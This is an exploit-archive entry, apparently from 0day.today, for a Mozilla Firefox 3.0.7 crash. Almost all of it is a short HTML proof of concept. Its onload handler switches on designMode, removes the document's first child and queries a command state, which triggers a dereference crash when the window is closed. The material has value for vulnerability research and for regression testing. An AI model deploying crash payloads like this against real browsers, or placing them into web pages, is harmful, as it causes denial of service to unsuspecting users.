id: 6775
date: 03/16/2009
title: Mozilla Firefox 3.0.7 OnbeforeUnLoad DesignMode Dereference Crash
author: SkyLined
cves: 

=================================================================
Mozilla Firefox 3.0.7 OnbeforeUnLoad DesignMode Dereference Crash
=================================================================





<BODY onload="document.designMode='on';//string

alert('Design mode is on!');
document.removeChild(document.firstChild);//object;
document.queryCommandState('BackColor');
alert('Close the Window to see the crash!');

">



#  0day.today [2023-03-27]  #